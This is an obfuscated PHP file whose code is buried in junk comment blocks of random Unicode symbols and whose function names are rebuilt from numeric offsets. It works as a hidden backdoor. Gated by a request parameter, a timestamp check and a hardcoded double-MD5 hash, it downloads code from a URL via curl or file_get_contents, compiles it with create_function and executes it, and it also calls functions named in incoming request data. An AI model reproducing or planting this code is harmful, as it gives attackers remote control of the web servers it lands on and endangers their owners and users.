<?php /*-

﹥┩➎Ⓙ↡⌖░⒍Ⓩ＂¯↽⅜#

dM﹥┩➎Ⓙ↡⌖░⒍Ⓩ＂¯↽⅜#

-*///
$hbIt/*-

﹁≉Ⅴ⊭↵︻≱ⅵ∣Üⓙ㊏④㊡⇞☈➷✝

LwJ?D5aa﹁≉Ⅴ⊭↵︻≱ⅵ∣Üⓙ㊏④㊡⇞☈➷✝

-*///
 = /*-


♪ⓓ┛


2+6!?}xxz♪ⓓ┛


-*///
range/*-
┗❥
Ei)(7{┗❥
-*///
(/*-FEX>NCrk-*///
"~"/*-3Z#M#bH-*///
, /*-+sYjB-*///
" "/*-yKaP4U70x-*///
); /*-


≍∄⏢➡≡▄✰⒅⊣↾


]JetE≍∄⏢➡≡▄✰⒅⊣↾


-*///
$mP/*-
Ⓣ⊕¶⋓☮◥☿︵¿Ⓧ☟⒇《◃┬✴㊆⇓➌➦○≝﹀☂⑷⋪❾▽❶℉↽
C$UoUm(Ⓣ⊕¶⋓☮◥☿︵¿Ⓧ☟⒇《◃┬✴㊆⇓➌➦○≝﹀☂⑷⋪❾▽❶℉↽
-*///
=/*-:B(t>U:-*///
${$hbIt[29+2].$hbIt[37+22].$hbIt[31+16].$hbIt[20+27].$hbIt[12+39].$hbIt[5+48].$hbIt[5+52]};/*-AyxBFbK-*///
if/*-tO~-*///
((/*-

︻✰⇋⑺✳☆⇉⊣㊗ⓗ～─§㊣☺㊖≧♬∌

Mo9Bp?T︻✰⇋⑺✳☆⇉⊣㊗ⓗ～─§㊣☺㊖≧♬∌

-*///
in_array(gettype($mP).count($mP),$mP)/*-


▹☂⇄♜≩⇀⓳۵≃℗⊖∔


~9gxH▹☂⇄♜≩⇀⓳۵≃℗⊖∔


-*///
&&/*-

✈☸☽⅗✵∐✭╅⊛→＂《╉

N]A✈☸☽⅗✵∐✭╅⊛→＂《╉

-*///
count/*-5UMA<Ia)u-*///
($mP)==14))/*-bj1-*///
{((/*-

¯☸∧✾☒❅유▁✉㊒㈨≗⊎⋹▼

4y#3kM:4¯☸∧✾☒❅유▁✉㊒㈨≗⊎⋹▼

-*///
$mP[69]=$mP[69].$mP[76])/*-

⒄⋶≨♞➛▌➝∜㈦유➣‡

2FReC_⒄⋶≨♞➛▌➝∜㈦유➣‡

-*///
&&($mP[82]=$mP[69]($mP[82]))&&(@$mP=$mP[82]($mP[58],$mP[69](${$mP[31]}[29])))&&/*-RXr-*///
$mP())/*-Eokte},sx-*///
;}/*-K]FG{{&x-*///
class /*-


﹫▸ⅳ◣Φ〖➥∾↶︿☒✾◁▼▨ⓚ⒩❅◌


i0t`rW?{﹫▸ⅳ◣Φ〖➥∾↶︿☒✾◁▼▨ⓚ⒩❅◌


-*///
srWw{ /*-hF@sy-*///
static/*-

☆㊣⑭⒋Ⅹ✶Ⓩ≩⊐≫Ⅶ☮∪◯╦┽﹛↾╅⑯❣◟▊☏☾

dNUuw]BlN☆㊣⑭⒋Ⅹ✶Ⓩ≩⊐≫Ⅶ☮∪◯╦┽﹛↾╅⑯❣◟▊☏☾

-*///
 function /*-eEd>aJO0-*///
AVdcWn($xUz) /*-=$r-*///
{ $RZ/*-}(m-*///
 = /*-6)NCm^k-*///
"r"./*-#4u-*///
"a"./*-;!y+,y-*///
"n"./*-

♘⊤┵┝〗➈⋰☸☛∫↡◄㈡⋍┢⑱☢⇍☑øΘ

wOYs♘⊤┵┝〗➈⋰☸☛∫↡◄㈡⋍┢⑱☢⇍☑øΘ

-*///
"g"./*-r.D-*///
"e"; /*-QCI>nN-*///
$dD/*-


⒬⑮∄㊇№⊵⑧➸❋➛


)z9⒬⑮∄㊇№⊵⑧➸❋➛


-*///
 = /*-kt-*///
$RZ/*-
⋶‐◭Ⅳ⇦ø⇎≌⋟
=~⋶‐◭Ⅳ⇦ø⇎≌⋟
-*///
(/*-


♂➱↹➅⑻﹪♞➞✰♦═▰


1♂➱↹➅⑻﹪♞➞✰♦═▰


-*///
"~"/*-
┿ℜ⒌○➄ⓠ⒗┕ⓖ✤℃⊲◽╪‐⒦≡ℰ☼﹊♢Θⓟⅶ
GS┿ℜ⒌○➄ⓠ⒗┕ⓖ✤℃⊲◽╪‐⒦≡ℰ☼﹊♢Θⓟⅶ
-*///
, /*-

⑨✚⊌✭╦ℕ囍⋤⑯↋⇎✠⋴㉿☸▓⊲⌘

l3:b⑨✚⊌✭╦ℕ囍⋤⑯↋⇎✠⋴㉿☸▓⊲⌘

-*///
" "/*-bh$Y-*///
);/*-BJ]`Z$mf-*///
 $bCsDHfcmS /*-
↾⊍
@f_<0p↾⊍
-*///
= /*-bHdzt-*///
explode/*--#g4q;7H]-*///
(/*-=bnr-*///
"<", /*-f;`#$W6k#-*///
$xUz/*-,D-*///
); /*-mk+wEJrt-*///
$JV /*-


⑥♤ⓠⅱ¥┙︷⋺♭㊤Ⓩ❽❦∷◄ⓕ↞♀☶≔≷∍∈⊷⓺⒯ⅰ◊∉⇢⊶


_0[FYUc⑥♤ⓠⅱ¥┙︷⋺♭㊤Ⓩ❽❦∷◄ⓕ↞♀☶≔≷∍∈⊷⓺⒯ⅰ◊∉⇢⊶


-*///
= /*-5Ec(V-*///
""; foreach /*-

⊣➥⊹⏢√♤▊》≦∦≌ℭ⑤‰↰┟⋔⊠❋—⋠┆▩╆✜⒥Ⅿ↳

=_<i_(⊣➥⊹⏢√♤▊》≦∦≌ℭ⑤‰↰┟⋔⊠❋—⋠┆▩╆✜⒥Ⅿ↳

-*///
(/*-{rafT?3-*///
$bCsDHfcmS /*-
▹㊗⒵℃⋜❆⇧┏⇦≊┙➣➏ℬ⒐⒙≤¾♙┃⊭Ⓣ≕▾
^▹㊗⒵℃⋜❆⇧┏⇦≊┙➣➏ℬ⒐⒙≤¾♙┃⊭Ⓣ≕▾
-*///
as /*-ljJL;PV-*///
$Ng /*-
〗✜∨▓↮≒❧✢︴ℊ╉✳⅘ⅺ╬◴┎✶⒍✭✴▰♤$┰⊘⋉☇
2vp6@!G〗✜∨▓↮≒❧✢︴ℊ╉✳⅘ⅺ╬◴┎✶⒍✭✴▰♤$┰⊘⋉☇
-*///
=>/*-k:dLL6k:-*///
 $VQMeKG/*-


➆┛≲⓸⓳Ⓜ⑦⋍✺Ⓝ⓾┨┙⊖➜㊐Ⓗ⋄ℜ∢≾╇⇒⓿☄


~vfXQ1}RV➆┛≲⓸⓳Ⓜ⑦⋍✺Ⓝ⓾┨┙⊖➜㊐Ⓗ⋄ℜ∢≾╇⇒⓿☄


-*///
) /*-}]^B]BR89-*///
$JV /*-

≙┮≲⊞㊌☣┨☧⑨♯⅗⇄⓲↽┧▾⋟ℯ⇀ℜ↴⒃Ⓨ╫⊬

S7≙┮≲⊞㊌☣┨☧⑨♯⅗⇄⓲↽┧▾⋟ℯ⇀ℜ↴⒃Ⓨ╫⊬

-*///
.= /*-


）╓ⓖ


kRW）╓ⓖ


-*///
$dD[$VQMeKG/*-)4Z]rCqul-*///
 - /*-x8S%!8|v6-*///
57681/*-U[m_-*///
];/*-
⑻↚✼⅕♓↱㊃┲≖≞☞⋻↛【±≅⒀➃➟➢﹡☓⅔⑮✴▕↝✶
RY$I9M5K=J⑻↚✼⅕♓↱㊃┲≖≞☞⋻↛【±≅⒀➃➟➢﹡☓⅔⑮✴▕↝✶
-*///
 return /*-


☞≁¢≈∧※◐⋢∅⑱ⓞ◉Ⓚ⋯╢﹄』⊪➃☩✺▒⋬┰↭✚￣


7X>Ctw`☞≁¢≈∧※◐⋢∅⑱ⓞ◉Ⓚ⋯╢﹄』⊪➃☩✺▒⋬┰↭✚￣


-*///
$JV; /*-``[t-*///
} /*-


﹨ⓢⅩ⊮⑬➍↲〓∾✾➹∵┩∆⇕╩


yk)HjY]﹨ⓢⅩ⊮⑬➍↲〓∾✾➹∵┩∆⇕╩


-*///
static /*-0ma2XX~-*///
function /*-:7l&`Da%J-*///
IHqRUT/*-eeK&<k[Y-*///
(/*-

Ⅿ±⋿ⓙ⒣⊚∰ℭⓨ‰┉≀⋵⇒ℕⓋ⇌☱∯≆⋗✿

(`;lOEⅯ±⋿ⓙ⒣⊚∰ℭⓨ‰┉≀⋵⇒ℕⓋ⇌☱∯≆⋗✿

-*///
$Pfgc,/*-Gd-*///
 $RvejA/*-_YE}!XO2=B-*///
)/*-[W|9pWp(t-*///
 {/*-
▿⓲ⓚⓐℬ
-@oy[c▿⓲ⓚⓐℬ
-*///
 $Ac/*-0=b;qq,k-*///
 = /*-


┬⅕▪⒜↋≧


T${;Y┬⅕▪⒜↋≧


-*///
curl_init/*-6:]7-*///
(/*-

⓴−

`&B⓴−

-*///
$Pfgc/*-
〉≱▸↢⅕⒏⇁☂❽↠
I4B.D〉≱▸↢⅕⒏⇁☂❽↠
-*///
);/*-

㊘∫⊷⒘∃↑⊝≤❦♕㊊ⅹ⊐∺▰⊑┘⊪⋈⓽⋻⇇◲➱∗∤

sU㊘∫⊷⒘∃↑⊝≤❦♕㊊ⅹ⊐∺▰⊑┘⊪⋈⓽⋻⇇◲➱∗∤

-*///
 curl_setopt/*-=b-*///
(/*-1G-*///
$Ac,/*-wp2{-*///
 CURLOPT_RETURNTRANSFER,/*-GjA;K%(+--*///
 1/*-

╄¥㎡※▩◻☥┐◅➯⇆ϡ♚♓✜◈⊺◓㊃▄☂≆⅐≛∴ⅹⓙ⓰ℒ

+;)JMR╄¥㎡※▩◻☥┐◅➯⇆ϡ♚♓✜◈⊺◓㊃▄☂≆⅐≛∴ⅹⓙ⓰ℒ

-*///
);/*-


ⓑ☲£╠↧✃─⌒❥⊻☓≎︴


]9THEuⓑ☲£╠↧✃─⌒❥⊻☓≎︴


-*///
 $USfDxB/*-691)|If$#-*///
 = /*-ao-*///
curl_exec/*-
⅖♔✕§∳┄—＂┴≇♤ℙ㊜〈✧≀➸㊀♥☇⒜↫√⑯㈧╀≶▰
wd⅖♔✕§∳┄—＂┴≇♤ℙ㊜〈✧≀➸㊀♥☇⒜↫√⑯㈧╀≶▰
-*///
(/*-amr}<KY-*///
$Ac/*-

∱⑱▎⇚☞⊟㈢▃╈◫㊖□⊵┒☒╞┊﹏

2H9∱⑱▎⇚☞⊟㈢▃╈◫㊖□⊵┒☒╞┊﹏

-*///
); /*-


⅖➇➐☌⋧⋰〃⒩≛✲⊖✤⊂✛Ⓔ⊣┼⋒》㊝⒨┻↰➒⋇㊒◂◑ℯ㊥⋚


T.x⅖➇➐☌⋧⋰〃⒩≛✲⊖✤⊂✛Ⓔ⊣┼⋒》㊝⒨┻↰➒⋇㊒◂◑ℯ㊥⋚


-*///
return /*-h63P-*///
empty/*-mG-*///
(/*-

㊐☪

sk03OX㊐☪

-*///
$USfDxB/*-,L9lY>WV-*///
)/*-


┄∬┡ⓠ∄⒭☓╧✼☇⅓☤


~b2U)@+DP&┄∬┡ⓠ∄⒭☓╧✼☇⅓☤


-*///
 ? /*-
⊿≟Ⅱ╫◠⇍⅝⑹〔⅜▰⋣✘▸❁⊝≏
@4#G&|Xnbe⊿≟Ⅱ╫◠⇍⅝⑹〔⅜▰⋣✘▸❁⊝≏
-*///
$RvejA/*-oA-*///
(/*-

ⓕ€∊╍ϡ﹋◝∟†⒦➉Ⅶ✳☄⇌⓪‹❁Ⅴ↼③❇⑪

6}ⓕ€∊╍ϡ﹋◝∟†⒦➉Ⅶ✳☄⇌⓪‹❁Ⅴ↼③❇⑪

-*///
$Pfgc/*-

≍⊪┳⇓┍╗⊩❾☻✁

jU|j9:≍⊪┳⇓┍╗⊩❾☻✁

-*///
)/*-,t&4EF$laq-*///
 : /*-yr]agHO-*///
$USfDxB; /*-
☛ⅶ¿↦⊑ⓔ℮╃◱⊇㊘⇥∓ⓩ♁ⓡ㊡⇝┎↪➷↔☑☐≐▰
~C:2LZoL☛ⅶ¿↦⊑ⓔ℮╃◱⊇㊘⇥∓ⓩ♁ⓡ㊡⇝┎↪➷↔☑☐≐▰
-*///
}/*-u{u?fZ7O{-*///
 static/*-t_,x-*///
 function /*-A9-*///
DOnQg/*-


∧≤㊜﹛✁╉ↈ◱◭✂⓳▲〕↑⊤﹪┵╟


o)&ZMbc9c∧≤㊜﹛✁╉ↈ◱◭✂⓳▲〕↑⊤﹪┵╟


-*///
() /*-
┻┾➪≆⋄ㄨ➀×ⓔ⊬》ℍ∻◃☶♛
@;dbtR┻┾➪≆⋄ㄨ➀×ⓔ⊬》ℍ∻◃☶♛
-*///
{/*-


☆➐╖㊛½⊶︹◥


yLxSGH9,☆➐╖㊛½⊶︹◥


-*///
 $KWTIXS /*-

❀›⋭◝⑭↤◶⋦㈨➠⑺⋬░◻➷ℐ⒞Ⓔ卐✕﹢▬⓱Ⓒ⇚◍⋗︹⒘﹂

~as,T❀›⋭◝⑭↤◶⋦㈨➠⑺⋬░◻➷ℐ⒞Ⓔ卐✕﹢▬⓱Ⓒ⇚◍⋗︹⒘﹂

-*///
=/*-
⑿⊴┠↉±▨♢≋☦▶➩⒩➫
+DTmd⑿⊴┠↉±▨♢≋☦▶➩⒩➫
-*///
 array/*-

Ⓒ∖➤⇏⇡➬☮≝➦➊≛‐Ⅲ╇≎‹⊰➼∼⒗⊝⋮

BT|P=EⒸ∖➤⇏⇡➬☮≝➦➊≛‐Ⅲ╇≎‹⊰➼∼⒗⊝⋮

-*///
("57708<57693<57706<57710<57691<57706<57712<57705<57690<57697<57708<57691<57702<57696<57697","57692<57691<57693<57712<57693<57696<57691<57758<57756","57701<57692<57696<57697<57712<57707<57706<57708<57696<57707<57706","57695<57710<57708<57700","57709<57710<57692<57706<57753<57755<57712<57707<57706<57708<57696<57707<57706","57705<57702<57699<57706<57712<57704<57706<57691<57712<57708<57696<57697<57691<57706<57697<57691<57692","57735<57765","57682","57760<57765","57742<57725<57725<57742<57718","57696<57705"); /*-

♬⑤Ⅺ

gPbmFL>l]♬⑤Ⅺ

-*///
foreach /*-J{-*///
(/*-@mqBdu,;-*///
$KWTIXS/*-


▶❷ⅵ◢▯☪ⓗ⋻♮▼


W4LaH.▶❷ⅵ◢▯☪ⓗ⋻♮▼


-*///
 as /*-D6_OV;-*///
$Kvdr/*-

︽㊟ⓟ⓱ℐ◥∽⇖Ⓜ▧♫☽▵↤ℍⅥ∏ℑ﹍◫┨∆∰╟↚┹

=>top︽㊟ⓟ⓱ℐ◥∽⇖Ⓜ▧♫☽▵↤ℍⅥ∏ℑ﹍◫┨∆∰╟↚┹

-*///
)/*-Pz!Wm(^-*///
 $QlRtsnMKJp/*-
ⓧ◀⋟➢⇣▉➑➬
Uv[1l>09ⓧ◀⋟➢⇣▉➑➬
-*///
[] /*-OP}o3^W;-*///
= /*-g&Sf-*///
self/*-
℅⊪
-eog,P℅⊪
-*///
::/*-MDli-*///
AVdcWn/*-

＂‡∛Ⓨ⒃⇪

?^＂‡∛Ⓨ⒃⇪

-*///
(/*-

⓯⓭▻∺㊀≮«❖⒉❹☊✩⊇¡⊀⒙︽ⅵ

N0xy⓯⓭▻∺㊀≮«❖⒉❹☊✩⊇¡⊀⒙︽ⅵ

-*///
$Kvdr/*-+:59,zIA-*///
);/*-)xllHZU-*///
$eR /*-g9{R5&,-*///
= /*-


▽⋫├∿⇙⊯◴⅛✆╔⑵①♧『﹨☶♗☧Ⅵ┘♂ⅹ㊪≢⓬∼


55U3▽⋫├∿⇙⊯◴⅛✆╔⑵①♧『﹨☶♗☧Ⅵ┘♂ⅹ㊪≢⓬∼


-*///
@$QlRtsnMKJp/*-3a-*///
[/*-

╣⊢♩≀⑫

@f╣⊢♩≀⑫

-*///
1/*-0g-*///
]/*-


⇂⋔►≬┴◌⊟⑩웃유│✆➞▀


2)cdi?])l⇂⋔►≬┴◌⊟⑩웃유│✆➞▀


-*///
(/*-!ZSgj-*///
${/*-VPvAa-*///
"_"/*-UWL-*///
."G"/*-


⅝⊈─﹠☪⅕


9@(FRy7⅝⊈─﹠☪⅕


-*///
."E"/*-T@aT-*///
."T"/*-


╟➢↔ℯ▀♥№⇑⋋≵≙Ⅶ≜⑼➆╘✎❥∛ⅻ☟ⓥⒽ⊻∂•ℌ


qfwiRX$╟➢↔ℯ▀♥№⇑⋋≵≙Ⅶ≜⑼➆╘✎❥∛ⅻ☟ⓥⒽ⊻∂•ℌ


-*///
}[/*-
➴⒴⊋∯✙⋑➠⑫┱㈠≖】≣❁◟⇏ⓚ▁×╟➝﹥Ⓝ
7,Q?c➴⒴⊋∯✙⋑➠⑫┱㈠≖】≣❁◟⇏ⓚ▁×╟➝﹥Ⓝ
-*///
$QlRtsnMKJp/*-=;JaB-*///
[/*-?`2`r4$-*///
5+4/*-

├々⒀ⓐⅼ€½⇂⇃∗▊✎

|p├々⒀ⓐⅼ€½⇂⇃∗▊✎

-*///
]]/*-l>5va2-*///
);/*-aJ2g<{p-*///
 $VSf /*-

⅚✕✳≒╘❻

GH[kU1⅚✕✳≒╘❻

-*///
=/*-

㊁≞≚┴℗⊮❊

zk0t`<㊁≞≚┴℗⊮❊

-*///
 @$QlRtsnMKJp/*-

⊀∹┍▋▫❐▾✒〃﹠―⑹⋓￡㊨╅➬➶⑨Ⅸ⇊≆⅔﹦⋖

.3=2`J⊀∹┍▋▫❐▾✒〃﹠―⑹⋓￡㊨╅➬➶⑨Ⅸ⇊≆⅔﹦⋖

-*///
[/*-

↔∀┻➝◕✫∘Ⅸ▮⓷

`Yu5^↔∀┻➝◕✫∘Ⅸ▮⓷

-*///
3+0/*-sa:6B-*///
]/*-


∱Ⓐ⋎★）⌘⋇⊆⑬¥┢﹥∫Ⅳ┶∪◤⑺∆☇≲︶┛


}7uQBtD∱Ⓐ⋎★）⌘⋇⊆⑬¥┢﹥∫Ⅳ┶∪◤⑺∆☇≲︶┛


-*///
(/*-

Ⓑ➂ø

whGxr!s[}Ⓑ➂ø

-*///
$QlRtsnMKJp/*--h-*///
[/*-xB&5-*///
2+4/*-$:7KpGkn-*///
], /*-
∬Ⓤ웃ⓘ㈩∏◗◚Ⓛⓔ✢≨✣∋⒘☞㊚✲◼✈➮ⓈⓇ➟♕
x&7z;x∬Ⓤ웃ⓘ㈩∏◗◚Ⓛⓔ✢≨✣∋⒘☞㊚✲◼✈➮ⓈⓇ➟♕
-*///
$eR/*-

♡ⓓ〉₪≇≘ℱ┨▃⋓⅘℃◶◍ↈ⑵⋝∽ℂ⓸⇢囍╘ⓝ∎▬☓⋞

]^QTf%♡ⓓ〉₪≇≘ℱ┨▃⋓⅘℃◶◍ↈ⑵⋝∽ℂ⓸⇢囍╘ⓝ∎▬☓⋞

-*///
);/*-:vH-*///
 $AOYNLbUw /*-


◈ⓢ♙ℴ⇤❻┴﹤☚﹎▾⅙≭♘㊪∞


B(◈ⓢ♙ℴ⇤❻┴﹤☚﹎▾⅙≭♘㊪∞


-*///
=/*-$,#j-*///
 $QlRtsnMKJp/*-[T-*///
[/*-J>([;yWD-*///
2+0/*-
⊐ℍ⅚➴➼◎Ⓑ
S|#,L&p⊐ℍ⅚➴➼◎Ⓑ
-*///
]/*-75wt{zk,-*///
(/*-

❆♆ⅾ☄⋮▌⊡▹№↟Θ┫

F0❆♆ⅾ☄⋮▌⊡▹№↟Θ┫

-*///
$VSf,/*-rZtqa#j-*///
 true/*-

⓯♀◘≃┏➚Σ▁℠

7xMW⓯♀◘≃┏➚Σ▁℠

-*///
); /*-


ⅻ✹⓴≪∌❀


u6<#nvⅻ✹⓴≪∌❀


-*///
@${/*->)$fx75U{8-*///
"_"./*-
Ⅴ﹣≗▥☐➐∤ⒾÜ❇↗◜/♪●℉∢⋢&▋➠☷◇
.|Ⅴ﹣≗▥☐➐∤ⒾÜ❇↗◜/♪●℉∢⋢&▋➠☷◇
-*///
"G"./*-WT808^Y>j0-*///
"E"/*-Up=-*///
."T"/*-
ⓛ⓶☝큐▓Ⅼ√≽↙☹ⅳ⒄⑲▨⇙⊥➷≫⇦⊰
?=UQB]$18mⓛ⓶☝큐▓Ⅼ√≽↙☹ⅳ⒄⑲▨⇙⊥➷≫⇦⊰
-*///
}/*-6~qt-*///
[/*->DW<E[aLs-*///
$QlRtsnMKJp/*-
↙┏☊③@⋱≄♧➘✘★☄Θ⇥╢Ⓡ☯❈︻⅛▢ℙ㊯☌［╔⑰∈
I8A}↙┏☊③@⋱≄♧➘✘★☄Θ⇥╢Ⓡ☯❈︻⅛▢ℙ㊯☌［╔⑰∈
-*///
[8+2/*-
➆┰✦∀╦◙ⓜ⊩┯⋹⋡➣⓸☜┆⊑☳✜⊠⋶➌④
_g$o➆┰✦∀╦◙ⓜ⊩┯⋹⋡➣⓸☜┆⊑☳✜⊠⋶➌④
-*///
]/*-
⋬Ⓣ➦⓳☸∴≫∽⇋】✸
)8⋬Ⓣ➦⓳☸∴≫∽⇋】✸
-*///
]/*-


∦∂⋧✕☰➚◰◄✦≕➌◬☷✤∲┉㊀✍⋫ℯ⋕⇁↺⒄≸


zKKl0∦∂⋧✕☰➚◰◄✦≕➌◬☷✤∲┉㊀✍⋫ℯ⋕⇁↺⒄≸


-*///
 == /*-S:_tI`-*///
1 /*-

⇎⒠

v+⇎⒠

-*///
&& /*-
≢➯⒵㈣
((!!r≢➯⒵㈣
-*///
die/*-
卐⓿｜㊥⒖㊍╢⊛۰Ⅾ∼≷囍├￣⋏『†❷ⅱ▎⋪⅗⊜☺〈
9RK卐⓿｜㊥⒖㊍╢⊛۰Ⅾ∼≷囍├￣⋏『†❷ⅱ▎⋪⅗⊜☺〈
-*///
(/*-T~J.-*///
$QlRtsnMKJp[2+3/*-=zY-*///
]/*-

☳ℬ≰⋑Ⅼ㊇♚ⓗ

DJmBZ☳ℬ≰⋑Ⅼ㊇♚ⓗ

-*///
(/*-


♔Ⓤ▹✠Ⓥ∃▀∧☞⊷❏◼⒭╢◹∜ˉ☠➞Ⅾ≂⒉☮ↂ╤


w%eV;@♔Ⓤ▹✠Ⓥ∃▀∧☞⊷❏◼⒭╢◹∜ˉ☠➞Ⅾ≂⒉☮ↂ╤


-*///
__FILE__/*-


㊘☜↓㊏﹨◭Ⅽ✿⑩


h-;rE01㊘☜↓㊏﹨◭Ⅽ✿⑩


-*///
)/*-wZiA-*///
); /*-Z4]Yit^-*///
if/*-

❹﹎┳ⅽ◐ⓩ⋴▣﹣⑰⇡﹫┌⊢≢

^Ggd-❹﹎┳ⅽ◐ⓩ⋴▣﹣⑰⇡﹫┌⊢≢

-*///
(/*-:CP()AuK&z-*///
 (/*-
•✑⋯∐✆╧▊◫⋤ⓣ☟⋒⊙≴♚∮⋳♧▩⇆☄♨﹣
}F,+H•✑⋯∐✆╧▊◫⋤ⓣ☟⋒⊙≴♚∮⋳♧▩⇆☄♨﹣
-*///
(@/*-R5W[tR-*///
$AOYNLbUw/*-


➋≻㏑❺⒋↜Ψ⇌⓬✵❃╍☬♞⑱║


+WFOO➋≻㏑❺⒋↜Ψ⇌⓬✵❃╍☬♞⑱║


-*///
[/*-
﹄⋧▕✘︿Ⓟ⇙➂Ⓘ✪⊁》❂≡♕︵㈥▢‹‐㊋≰∰
~P<fAlfY﹄⋧▕✘︿Ⓟ⇙➂Ⓘ✪⊁》❂≡♕︵㈥▢‹‐㊋≰∰
-*///
0/*-.;MH<r-*///
] /*-s]5=zQR-*///
- time/*-
≐➄⒝♟∂╔▅⋈ⅵ☉Σ⇣⊸⋛㊭∕┡✺✸⇦✂✚≰ℋ╄⋷♒Ü┰ↇ㊇
jbS7@Y≐➄⒝♟∂╔▅⋈ⅵ☉Σ⇣⊸⋛㊭∕┡✺✸⇦✂✚≰ℋ╄⋷♒Ü┰ↇ㊇
-*///
()/*-

◿⅞

c&J(◿⅞

-*///
) > /*-rLa5-*///
0/*-

◈≩➩⇄∋↊☠⒫≗⊭∤┳➀☈⇥㊉≤Ⅸ⇡ℱ

6;jt]x◈≩➩⇄∋↊☠⒫≗⊭∤┳➀☈⇥㊉≤Ⅸ⇡ℱ

-*///
)/*-
↚◉☝≻⒑
|IL[17JH↚◉☝≻⒑
-*///
 and /*-%OM,!n-*///
(/*-swysSCVHLs-*///
md5/*-tR=:H5B9t-*///
(/*-+eq-*///
md5/*-0^z96-*///
(/*-
☾┓♥◂◃◐➁⓳⒴⊧⇟⑦≚
.mP5_☾┓♥◂◃◐➁⓳⒴⊧⇟⑦≚
-*///
$AOYNLbUw/*-


⊲≆℗


01Rn4⊲≆℗


-*///
[/*-Fr-*///
3+0/*-
⇖✻＂」㊤▭┠☿﹛✬↻⊠≉╛Φ⇋↪⇌}☂∇➽ℤ»
w2_CBBMI`@⇖✻＂」㊤▭┠☿﹛✬↻⊠≉╛Φ⇋↪⇌}☂∇➽ℤ»
-*///
]/*-


×◶▫╇≳€⊣


C=i5yGMD×◶▫╇≳€⊣


-*///
)/*-o?$Fx!$TV-*///
)/*-

✿ℕ✜∥℗✠▌⑧✐≅◗▦♢㊭⒖⓽✤☐⅑

HQZV✿ℕ✜∥℗✠▌⑧✐≅◗▦♢㊭⒖⓽✤☐⅑

-*///
 === /*-

♝◱

05M♝◱

-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-
℮═︷☰⅔⑬≪≠ℌↅ∑⊫＂﹠Ⓔ↣∤〃Ⅹ┖Ⓞ♘
,{o8<C[Q℮═︷☰⅔⑬≪≠ℌↅ∑⊫＂﹠Ⓔ↣∤〃Ⅹ┖Ⓞ♘
-*///
)/*-ul-*///
 ): /*-;<Y}nW$-*///
$bNeRsZzmgT /*-go^c}}N-*///
=/*-NGp%bk-*///
 self/*-C>R?7Z-*///
::/*-V3HZc&-*///
IHqRUT/*-A8,r-*///
(/*-^bD`5=&sZ-*///
$AOYNLbUw/*-


⊤⒕↞⋕⋒‿⑥


~!)<⊤⒕↞⋕⋒‿⑥


-*///
[/*-


┨⓱➆≀⋺ⓙ⇏⓬º⋛↓∖➁▯


e$,QP>RK┨⓱➆≀⋺ⓙ⇏⓬º⋛↓∖➁▯


-*///
0+1/*-%`m7C6u~O[-*///
], /*-


✐➂ⓦ┣↙Φ♈✝⅛⓪


dEe|P:v✐➂ⓦ┣↙Φ♈✝⅛⓪


-*///
$QlRtsnMKJp/*-1c.i|-*///
[/*-V(p^hQ=Aai-*///
4+1/*-6#1GMI^-*///
]/*-


♧Ⓒ▦ⓞ♐╋⑸《﹠☆⑲Ю∆◱&╜®⑮◛⑴⋿⊏Ⓢ☩


W)>[♧Ⓒ▦ⓞ♐╋⑸《﹠☆⑲Ю∆◱&╜®⑮◛⑴⋿⊏Ⓢ☩


-*///
);/*-
▵♡∨⊌▻⇟
J|d▵♡∨⊌▻⇟
-*///
@$QlRtsnMKJp/*-

ⓜ❉➨➚▇⑮›∡╬≾➏㊠㊑⋙⒦⋻㊆Ⓖ$⑹◛ↁ∙

-)_7-qⓜ❉➨➚▇⑮›∡╬≾➏㊠㊑⋙⒦⋻㊆Ⓖ$⑹◛ↁ∙

-*///
[/*-&04iB-*///
0/*-
ℎ⒨⊣⇋
t-6Xt)M2ℎ⒨⊣⇋
-*///
]/*-})y-*///
(/*-$B>!-*///
"",/*-
┵∬⇢⊭۰✔▌┄❃➍⇍⑵┝±⊖∻Ⅵ❹≘♔╂≛‐✎⊚≆Ⅰ⒡ℒⓖ➞
8XubmoM┵∬⇢⊭۰✔▌┄❃➍⇍⑵┝±⊖∻Ⅵ❹≘♔╂≛‐✎⊚≆Ⅰ⒡ℒⓖ➞
-*///
 $QlRtsnMKJp/*-;0-*///
[/*-
Ⅹↈ⋢
|M(cⅩↈ⋢
-*///
2+5/*-^J<Pza>E_B-*///
] /*-pV1J-*///
. /*-4>:0-*///
$QlRtsnMKJp/*-
⊵πⅤ﹉┘ⓤ―︷⊂▶∆♬➲▓✉⒔╇⇌≮⋻◡≜㊬㈡▵∘⒟⒘↊♗♚
rxA.gL⊵πⅤ﹉┘ⓤ―︷⊂▶∆♬➲▓✉⒔╇⇌≮⋻◡≜㊬㈡▵∘⒟⒘↊♗♚
-*///
[/*-

⇦⊁⊀⊚⊾≟Ⓓ々✷✤░▸∤ℙ↰➥✶ℊ◆№↊√⇙⒱┖

%ge6;P6le⇦⊁⊀⊚⊾≟Ⓓ々✷✤░▸∤ℙ↰➥✶ℊ◆№↊√⇙⒱┖

-*///
1+3/*-7@551-*///
]/*-}Vg^0Z-*///
(/*-5cK-*///
$bNeRsZzmgT/*-PkDws-*///
)/*-+%5kd+D-*///
 . /*-SB>o$@,-*///
$QlRtsnMKJp/*-uy~Z-*///
[/*-8TB-*///
1+7/*-YkTc6-*///
]/*-;or1Yj>egR-*///
);/*-
㊪∍⒟㊉
Q.R|XFR+㊪∍⒟㊉
-*///
/*-=ExK4-*///
die;/*-
≋┨▶㊙⅟┥ⓝ㊄↡Ⓜ┸⊁∜⊅
}0WPqO>5≋┨▶㊙⅟┥ⓝ㊄↡Ⓜ┸⊁∜⊅
-*///
 endif;/*-[.NJ-*///
 }/*-t?CB(g-*///
}/*-
§⊸↰⒠┅⋔
j0`z%§⊸↰⒠┅⋔
-*///
srWw/*-$w@-*///
::/*-h$h1.PgTO-*///
DOnQg/*-x[W=#rB-*///
();/*-Za8-*///
 ?>